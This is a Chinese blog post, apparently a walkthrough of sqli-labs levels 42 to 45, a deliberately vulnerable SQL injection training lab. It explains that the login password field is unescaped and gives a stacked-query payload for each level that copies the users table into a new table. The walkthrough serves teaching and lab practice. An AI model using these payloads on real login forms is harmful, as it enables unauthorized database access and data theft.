sqli-labs Less42-Less45

Posted 2020-11-28 骑着七彩祥云的少年

Less-42

打开这一关发现和之前的二次注入界面一样，使用admin admin登陆，发现回显正常

 

 打开login.php文件，发现password没有经过mysqli_real_escape_string()函数进行处理，所以这个时候我们在这个位置进行构造，在password处使用堆叠构造

 

 注入之前先把浏览器的password的type格式改为铭文格式，使用fn+f12打开body

 

 然后可以在password里进行堆叠注入了

a

a\';create table lxk42 like users;insert into lxk42 select * from users; # 发现报错

 

 但我们发现和之前的表创建成功了

 

 

Less-43

这一关使用的包裹形式是?id=1\')  其他均与第42关一样

a

a\');create table lxk43 like users;insert into lxk43 select *from users; #

 

Less-44

这一关使用的包裹形式是单引号，且没有回显信息，这预示着我们不能使用报错注入，其他均和第42关一样

a\';create table lxk44 like users;insert into lxk44 select *from users; #

 

Less-45

这一关使用的是单引号和括号进行包裹，没有回显信息，其余的均和第42关一样

a\');create table lxk45 like users;insert into lxk45 select *from users; #